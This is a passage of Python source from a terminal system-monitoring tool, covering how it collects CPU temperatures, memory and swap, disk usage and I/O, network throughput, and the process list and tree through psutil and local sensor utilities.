if len(cls.cpu_usage[0]) > Term.width * 4:
del cls.cpu_usage[0][0]
cpu_times_percent = psutil.cpu_times_percent()
for x in ["upper", "lower"]:
if getattr(CONFIG, "cpu_graph_" + x) == "total":
setattr(cls, "cpu_" + x, cls.cpu_usage[0])
else:
getattr(cls, "cpu_" + x).append(ceil(getattr(cpu_times_percent, getattr(CONFIG, "cpu_graph_" + x))))
if len(getattr(cls, "cpu_" + x)) > Term.width * 4:
del getattr(cls, "cpu_" + x)[0]
for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
cls.cpu_usage[n].append(ceil(thread))
if len(cls.cpu_usage[n]) > Term.width * 2:
del cls.cpu_usage[n][0]
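#* psutil can report frequency in MHz or, on some platforms, GHz; values of 10 or below are treated as GHz and converted to MHz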
try:
if CONFIG.show_cpu_freq and hasattr(psutil.cpu_freq(), "current"):
freq: float = psutil.cpu_freq().current
cls.cpu_freq = round(freq * (1 if freq > 10 else 1000))
elif cls.cpu_freq > 0:
cls.cpu_freq = 0
except Exception as e:
if not cls.freq_error:
cls.freq_error = True
errlog.error("Exception while getting cpu frequency!")
errlog.exception(f'{e}')
else:
pass
cls.load_avg = [round(lavg, 2) for lavg in psutil.getloadavg()]
cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3].replace(" days,", "d").replace(" day,", "d")
if CONFIG.check_temp and cls.got_sensors:
cls._collect_temps()
@classmethod
def _collect_temps(cls):
temp: int = 1000
cores: List[int] = []
core_dict: Dict[int, int] = {}
entry_int: int = 0
cpu_type: str = ""
c_max: int = 0
s_name: str = "_-_"
s_label: str = "_-_"
if cls.sensor_method == "psutil":
try:
if CONFIG.cpu_sensor != "Auto":
s_name, s_label = CONFIG.cpu_sensor.split(":", 1)
for name, entries in psutil.sensors_temperatures().items():
for num, entry in enumerate(entries, 1):
if name == s_name and (entry.label == s_label or str(num) == s_label):
if entry.label.startswith("Package"):
cpu_type = "intel"
elif entry.label.startswith("Tdie"):
cpu_type = "ryzen"
else:
cpu_type = "other"
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
temp = round(entry.current)
elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current"):
if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other":
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
temp = round(entry.current)
elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current"):
if entry.label.startswith(("Core", "Tccd")):
entry_int = int(entry.label.replace("Core", "").replace("Tccd", ""))
if entry_int in core_dict and cpu_type != "ryzen":
if c_max == 0:
c_max = max(core_dict) + 1
if c_max < THREADS // 2 and (entry_int + c_max) not in core_dict:
core_dict[(entry_int + c_max)] = round(entry.current)
continue
elif entry_int in core_dict:
continue
core_dict[entry_int] = round(entry.current)
continue
elif cpu_type in ["intel", "ryzen"]:
continue
if not cpu_type:
cpu_type = "other"
if not cls.cpu_temp_high or cls.sensor_swap:
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
temp = round(entry.current)
cores.append(round(entry.current))
if core_dict:
if not temp or temp == 1000:
temp = sum(core_dict.values()) // len(core_dict)
if not cls.cpu_temp_high or not cls.cpu_temp_crit:
cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95
cls.cpu_temp[0].append(temp)
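#* Ryzen sensors expose one Tccd reading per CCD, so each CCD temperature is repeated for all threads mapped to that CCD via CORE_MAP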
if cpu_type == "ryzen":
ccds: int = len(core_dict)
cores_per_ccd: int = CORES // ccds
z: int = 1
for x in range(THREADS):
if x == CORES:
z = 1
if CORE_MAP[x] + 1 > cores_per_ccd * z:
z += 1
if z in core_dict:
cls.cpu_temp[x+1].append(core_dict[z])
else:
for x in range(THREADS):
if CORE_MAP[x] in core_dict:
cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]])
elif len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cls.cpu_temp[0].append(temp)
if len(cores) > 1:
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
try:
if cls.sensor_method == "coretemp":
temp = max(0, int(subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip()))
cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", universal_newlines=True).split()]
if len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "osx-cpu-temp":
temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", universal_newlines=True).strip()[:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "vcgencmd":
temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip()[5:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 60
cls.cpu_temp_crit = 80
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
if not cores:
cls.cpu_temp[0].append(temp)
if not core_dict and len(cores) <= 1:
cls.cpu_temp_only = True
if len(cls.cpu_temp[0]) > 5:
for n in range(len(cls.cpu_temp)):
if cls.cpu_temp[n]:
del cls.cpu_temp[n][0]
@classmethod
def _draw(cls):
CpuBox._draw_fg()
class MemCollector(Collector):
'''Collects memory and disks information'''
values: Dict[str, int] = {}
vlist: Dict[str, List[int]] = {}
percent: Dict[str, int] = {}
string: Dict[str, str] = {}
swap_values: Dict[str, int] = {}
swap_vlist: Dict[str, List[int]] = {}
swap_percent: Dict[str, int] = {}
swap_string: Dict[str, str] = {}
disks: Dict[str, Dict]
disk_hist: Dict[str, Tuple] = {}
timestamp: float = time()
disks_io_dict: Dict[str, Dict[str, List[int]]] = {}
recheck_diskutil: bool = True
diskutil_map: Dict[str, str] = {}
io_error: bool = False
old_disks: List[str] = []
old_io_disks: List[str] = []
fstab_filter: List[str] = []
excludes: List[str] = ["squashfs", "nullfs"]
if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
buffer: str = MemBox.buffer
@classmethod
def _collect(cls):
#* Collect memory
mem = psutil.virtual_memory()
if hasattr(mem, "cached"):
cls.values["cached"] = mem.cached
else:
cls.values["cached"] = mem.active
cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
cls.values["used"] = cls.values["total"] - cls.values["available"]
for key, value in cls.values.items():
cls.string[key] = floating_humanizer(value)
if key == "total": continue
cls.percent[key] = round(value * 100 / cls.values["total"])
if CONFIG.mem_graphs:
if not key in cls.vlist: cls.vlist[key] = []
cls.vlist[key].append(cls.percent[key])
if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
#* Collect swap
if CONFIG.show_swap or CONFIG.swap_disk:
swap = psutil.swap_memory()
cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
if swap.total:
if not MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = True
for key, value in cls.swap_values.items():
cls.swap_string[key] = floating_humanizer(value)
if key == "total": continue
cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
if CONFIG.mem_graphs:
if not key in cls.swap_vlist: cls.swap_vlist[key] = []
cls.swap_vlist[key].append(cls.swap_percent[key])
if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
if not CONFIG.show_disks: return
#* Collect disks usage
disk_read: int = 0
disk_write: int = 0
dev_name: str
disk_name: str
filtering: Tuple = ()
filter_exclude: bool = False
io_string_r: str
io_string_w: str
u_percent: int
cls.disks = {}
if CONFIG.disks_filter:
if CONFIG.disks_filter.startswith("exclude="):
filter_exclude = True
filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
else:
filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
try:
io_counters = psutil.disk_io_counters(perdisk=SYSTEM != "BSD", nowrap=True)
except ValueError as e:
if not cls.io_error:
cls.io_error = True
errlog.error('Non-fatal error during disk io collection!')
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
errlog.error('Caused by outdated psutil version.')
errlog.exception(f'{e}')
io_counters = None
if SYSTEM == "MacOS" and cls.recheck_diskutil:
cls.recheck_diskutil = False
try:
dutil_out = subprocess.check_output(["diskutil", "list", "physical"], universal_newlines=True)
for line in dutil_out.split("\n"):
line = line.replace("\u2068", "").replace("\u2069", "")
if line.startswith("/dev/"):
xdisk = line.split()[0].replace("/dev/", "")
elif "Container" in line:
ydisk = line.split()[3]
if xdisk and ydisk:
cls.diskutil_map[xdisk] = ydisk
xdisk = ydisk = ""
except:
pass
if CONFIG.use_fstab and SYSTEM != "MacOS" and not cls.fstab_filter:
try:
with open('/etc/fstab','r') as fstab:
for line in fstab:
line = line.strip()
if line and not line.startswith('#'):
mount_data = (line.split())
if mount_data[2].lower() != "swap":
cls.fstab_filter += [mount_data[1]]
errlog.debug(f'new fstab_filter set : {cls.fstab_filter}')
except IOError:
CONFIG.use_fstab = False
errlog.warning(f'Error reading fstab, use_fstab flag reset to {CONFIG.use_fstab}')
if not CONFIG.use_fstab and cls.fstab_filter:
cls.fstab_filter = []
errlog.debug(f'use_fstab flag has been turned to {CONFIG.use_fstab}, fstab_filter cleared')
for disk in psutil.disk_partitions(all=CONFIG.use_fstab or not CONFIG.only_physical):
disk_io = None
io_string_r = io_string_w = ""
if CONFIG.use_fstab and disk.mountpoint not in cls.fstab_filter:
continue
disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
if cls.excludes and disk.fstype in cls.excludes:
continue
if filtering and ((not filter_exclude and not disk.mountpoint in filtering) or (filter_exclude and disk.mountpoint in filtering)):
continue
if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
continue
try:
disk_u = psutil.disk_usage(disk.mountpoint)
except:
disk_u = None
u_percent = round(getattr(disk_u, "percent", 0))
cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
for name in ["total", "used", "free"]:
cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
#* Collect disk io
if io_counters:
try:
if SYSTEM != "BSD":
dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
if not dev_name in io_counters:
for names in io_counters:
if names in dev_name:
disk_io = io_counters[names]
break
else:
if cls.diskutil_map:
for names, items in cls.diskutil_map.items():
if items in dev_name and names in io_counters:
disk_io = io_counters[names]
else:
disk_io = io_counters[dev_name]
elif disk.mountpoint == "/":
disk_io = io_counters
else:
raise Exception
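#* Disk speeds are the io counter deltas since the last collection divided by elapsed time; the >> 20 shift stores the values as MiB/s for the io graphs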
disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp)) #type: ignore
disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp)) #type: ignore
if not disk.device in cls.disks_io_dict:
cls.disks_io_dict[disk.device] = {"read" : [], "write" : [], "rw" : []}
cls.disks_io_dict[disk.device]["read"].append(disk_read >> 20)
cls.disks_io_dict[disk.device]["write"].append(disk_write >> 20)
cls.disks_io_dict[disk.device]["rw"].append((disk_read + disk_write) >> 20)
if len(cls.disks_io_dict[disk.device]["read"]) > MemBox.width:
del cls.disks_io_dict[disk.device]["read"][0], cls.disks_io_dict[disk.device]["write"][0], cls.disks_io_dict[disk.device]["rw"][0]
except:
disk_read = disk_write = 0
else:
disk_read = disk_write = 0
if disk_io:
cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
if CONFIG.io_mode or MemBox.disks_width > 30:
if disk_read > 0:
io_string_r = f'▲{floating_humanizer(disk_read, short=True)}'
if disk_write > 0:
io_string_w = f'▼{floating_humanizer(disk_write, short=True)}'
if CONFIG.io_mode:
cls.disks[disk.device]["io_r"] = io_string_r
cls.disks[disk.device]["io_w"] = io_string_w
elif disk_read + disk_write > 0:
io_string_r += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
cls.disks[disk.device]["io"] = io_string_r + (" " if io_string_w and io_string_r else "") + io_string_w
if CONFIG.swap_disk and MemBox.swap_on:
cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
for name in ["total", "used", "free"]:
cls.disks["__swap"][name] = cls.swap_string[name]
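#* Reorder the dict so the swap pseudo-disk is shown directly after the first (root) disk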
if len(cls.disks) > 2:
try:
new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
new["__swap"] = cls.disks.pop("__swap")
new.update(cls.disks)
cls.disks = new
except:
pass
if cls.old_disks != list(cls.disks) or cls.old_io_disks != list(cls.disks_io_dict):
MemBox.redraw = True
cls.recheck_diskutil = True
cls.old_disks = list(cls.disks)
cls.old_io_disks = list(cls.disks_io_dict)
cls.timestamp = time()
@classmethod
def _draw(cls):
MemBox._draw_fg()
class NetCollector(Collector):
'''Collects network stats'''
buffer: str = NetBox.buffer
nics: List[str] = []
nic_i: int = 0
nic: str = ""
new_nic: str = ""
nic_error: bool = False
reset: bool = False
graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
#min_top: int = 10<<10
#* Stats structure = stats[network device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_low] = int, List[int], bool
stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
#* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
strings: Dict[str, Dict[str, Dict[str, str]]] = {}
switched: bool = False
timestamp: float = time()
net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
auto_min: bool = CONFIG.net_auto
net_iface: str = CONFIG.net_iface
sync_top: int = 0
sync_string: str = ""
address: str = ""
@classmethod
def _get_nics(cls):
'''Get a list of all network devices sorted by highest throughput'''
cls.nic_i = 0
cls.nics = []
cls.nic = ""
try:
io_all = psutil.net_io_counters(pernic=True)
except Exception as e:
if not cls.nic_error:
cls.nic_error = True
errlog.exception(f'{e}')
if not io_all: return
up_stat = psutil.net_if_stats()
for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
if nic not in up_stat or not up_stat[nic].isup:
continue
cls.nics.append(nic)
if not cls.nics: cls.nics = [""]
cls.nic = cls.nics[cls.nic_i]
if cls.net_iface and cls.net_iface in cls.nics:
cls.nic = cls.net_iface
cls.nic_i = cls.nics.index(cls.nic)
@classmethod
def switch(cls, key: str):
if cls.net_iface: cls.net_iface = ""
if len(cls.nics) < 2 and cls.nic in cls.nics:
return
if cls.nic_i == -1:
cls.nic_i = 0 if key == "n" else -1
else:
cls.nic_i += +1 if key == "n" else -1
cls.nic_i %= len(cls.nics)
cls.new_nic = cls.nics[cls.nic_i]
cls.switched = True
Collector.collect(NetCollector, redraw=True)
@classmethod
def _collect(cls):
speed: int
stat: Dict
up_stat = psutil.net_if_stats()
if sorted(cls.nics) != sorted(nic for nic in up_stat if up_stat[nic].isup):
old_nic = cls.nic
cls._get_nics()
cls.nic = old_nic
if cls.nic not in cls.nics:
cls.nic_i = -1
else:
cls.nic_i = cls.nics.index(cls.nic)
if cls.switched:
cls.nic = cls.new_nic
cls.switched = False
if not cls.nic or cls.nic not in up_stat:
cls._get_nics()
if not cls.nic: return
NetBox.redraw = True
try:
io_all = psutil.net_io_counters(pernic=True)[cls.nic]
except KeyError:
return
if not cls.nic in cls.stats:
cls.stats[cls.nic] = {}
cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
cls.strings[cls.nic][direction][v] = ""
cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
if cls.nic in psutil.net_if_addrs():
cls.address = getattr(psutil.net_if_addrs()[cls.nic][0], "address", "")
for direction in ["download", "upload"]:
stat = cls.stats[cls.nic][direction]
strings = cls.strings[cls.nic][direction]
#* Calculate current speed
stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
stat["last"] = stat["total"]
speed = stat["speed"][-1]
if cls.net_min[direction] == -1:
cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
stat["graph_top"] = cls.net_min[direction]
stat["graph_lower"] = 7
if not cls.auto_min:
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
if stat["offset"] and stat["offset"] > stat["total"]:
cls.reset = True
if cls.reset:
if not stat["offset"]:
stat["offset"] = stat["total"]
else:
stat["offset"] = 0
if direction == "upload":
cls.reset = False
NetBox.redraw = True
if len(stat["speed"]) > NetBox.width * 2:
del stat["speed"][0]
strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
if speed > stat["top"] or not stat["top"]:
stat["top"] = speed
strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
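#* Auto scaling: count consecutive samples above the graph top (graph_raise) or below a tenth of it (graph_lower); after 5 of either the top is raised to recent max / 0.8 or lowered to 3x recent max with a 10 KiB floor, forcing a redraw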
if cls.auto_min:
if speed > stat["graph_top"]:
stat["graph_raise"] += 1
if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
elif speed < stat["graph_top"] // 10:
stat["graph_lower"] += 1
if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
if stat["graph_raise"] >= 5:
stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
elif stat["graph_lower"] >= 5:
stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
stat["graph_raise"] = 0
stat["graph_lower"] = 0
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
cls.timestamp = time()
if CONFIG.net_sync:
c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
if c_max != cls.sync_top:
cls.sync_top = c_max
cls.sync_string = floating_humanizer(cls.sync_top, short=True)
NetBox.redraw = True
@classmethod
def _draw(cls):
NetBox._draw_fg()
class ProcCollector(Collector):
'''Collects process stats'''
buffer: str = ProcBox.buffer
search_filter: str = ""
case_sensitive: bool = False
processes: Dict = {}
num_procs: int = 0
det_cpu: float = 0.0
detailed: bool = False
detailed_pid: Union[int, None] = None
details: Dict[str, Any] = {}
details_cpu: List[int] = []
details_mem: List[int] = []
expand: int = 0
collapsed: Dict = {}
tree_counter: int = 0
p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
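#* Sort keys are pre-compiled eval expressions applied to each psutil process info dict; 0.0 (err) is the ad_value psutil substitutes for unreadable attributes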
sort_expr: Dict = {}
sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
@classmethod
def _collect(cls):
'''List all processes with pid, name, arguments, threads, username, memory percent and cpu percent'''
if not "proc" in Box.boxes: return
out: Dict = {}
cls.det_cpu = 0.0
sorting: str = CONFIG.proc_sorting
reverse: bool = not CONFIG.proc_reversed
proc_per_cpu: bool = CONFIG.proc_per_core
search: List[str] = []
if cls.search_filter:
if cls.case_sensitive:
search = [i.strip() for i in cls.search_filter.split(",")]
else:
search = [i.strip() for i in cls.search_filter.lower().split(",")]
err: float = 0.0
n: int = 0
if CONFIG.proc_tree and sorting == "arguments":
sorting = "program"
sort_cmd = cls.sort_expr[sorting]
if CONFIG.proc_tree:
cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
else:
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt or cls.proc_interrupt:
return
if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
continue
if p.info["cmdline"] == err:
p.info["cmdline"] = ""
if p.info["username"] == err:
p.info["username"] = ""
if p.info["num_threads"] == err:
p.info["num_threads"] = 0
if search:
if cls.detailed and p.info["pid"] == cls.detailed_pid:
cls.det_cpu = p.info["cpu_percent"]
for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
if not cls.case_sensitive:
value = value.lower()
for s in search:
if s in value:
break
else: continue
break
else: continue
cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
mem = p.info["memory_percent"]
if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
mem_b = p.info["memory_info"].rss
else:
mem_b = 0
cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
out[p.info["pid"]] = {
"name" : p.info["name"],
"cmd" : cmd,
"threads" : p.info["num_threads"],
"username" : p.info["username"],
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu }
n += 1
cls.num_procs = n
cls.processes = out.copy()
if cls.detailed:
cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
if cls.expand > 5: cls.expand = 5
if cls.detailed and not cls.details.get("killed", False):
try:
c_pid = cls.detailed_pid
det = psutil.Process(c_pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
cls.details["killed"] = True
cls.details["status"] = psutil.STATUS_DEAD
ProcBox.redraw = True
else:
attrs: List[str] = ["status", "memory_info", "create_time"]
if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
if cls.expand:
attrs.extend(["nice", "terminal"])
if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
cls.details = det.as_dict(attrs=attrs, ad_value="")
if det.parent() != None: cls.details["parent_name"] = det.parent().name()
else: cls.details["parent_name"] = ""
cls.details["pid"] = c_pid
if c_pid in cls.processes:
cls.details["name"] = cls.processes[c_pid]["name"]
cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
cls.details["username"] = cls.processes[c_pid]["username"]
cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
else:
cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
cls.details["threads"] = f'{cls.details["num_threads"]}'
cls.details["cpu_percent"] = round(cls.det_cpu)
cls.details["killed"] = False
if SYSTEM == "MacOS":
cls.details["cpu_num"] = -1
cls.details["io_counters"] = ""
if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
else: cls.details["memory_bytes"] = "? Bytes"
if isinstance(cls.details["create_time"], float):
uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
else: cls.details["uptime"] = f'{uptime}'
else: cls.details["uptime"] = "??:??:??"
if cls.expand:
if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
if SYSTEM == "BSD":
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
else: cls.details["io_write"] = "?"
else:
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
else: cls.details["io_write"] = "?"
if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
cls.details_cpu.append(cls.details["cpu_percent"])
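#* Memory percent is scaled up non-linearly so small values are still visible in the one line detail graph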
mem = cls.details["memory_percent"]
if mem > 80: mem = round(mem)
elif mem > 60: mem = round(mem * 1.2)
elif mem > 30: mem = round(mem * 1.5)
elif mem > 10: mem = round(mem * 2)
elif mem > 5: mem = round(mem * 10)
else: mem = round(mem * 20)
cls.details_mem.append(mem)
if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
@classmethod
def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: List[str]):
'''List all processes in a tree view with pid, name, threads, username, memory percent and cpu percent'''
out: Dict = {}
err: float = 0.0
det_cpu: float = 0.0
infolist: Dict = {}
cls.tree_counter += 1
tree = defaultdict(list)
n: int = 0
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt: return
try:
tree[p.ppid()].append(p.pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
pass
else:
infolist[p.pid] = p.info
n += 1
if 0 in tree and 0 in tree[0]:
tree[0].remove(0)
def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
nonlocal infolist, proc_per_cpu, search, out, det_cpu
name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
cont: bool = True
getinfo: Dict = {}
if cls.collect_interrupt: return
try:
name = psutil.Process(pid).name()
if name == "idle": return
except psutil.Error:
cont = False
name = ""
if pid in infolist:
getinfo = infolist[pid]
if search and not found:
if cls.detailed and pid == cls.detailed_pid:
det_cpu = getinfo["cpu_percent"]
if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
if not cls.case_sensitive:
value = value.lower()
for s in search:
if s in value:
found = True
break
else: continue
break
else: cont = False
if cont:
if getinfo:
if getinfo["num_threads"] == err: threads = 0
else: threads = getinfo["num_threads"]
if getinfo["username"] == err: username = ""
else: username = getinfo["username"]
cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
mem = getinfo["memory_percent"]
if getinfo["cmdline"] == err: cmd = ""
else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
mem_b = getinfo["memory_info"].rss
else:
mem_b = 0
else:
threads = mem_b = 0
username = ""
mem = cpu = 0.0
if pid in cls.collapsed:
collapse = cls.collapsed[pid]
else:
collapse = depth > CONFIG.tree_depth
cls.collapsed[pid] = collapse
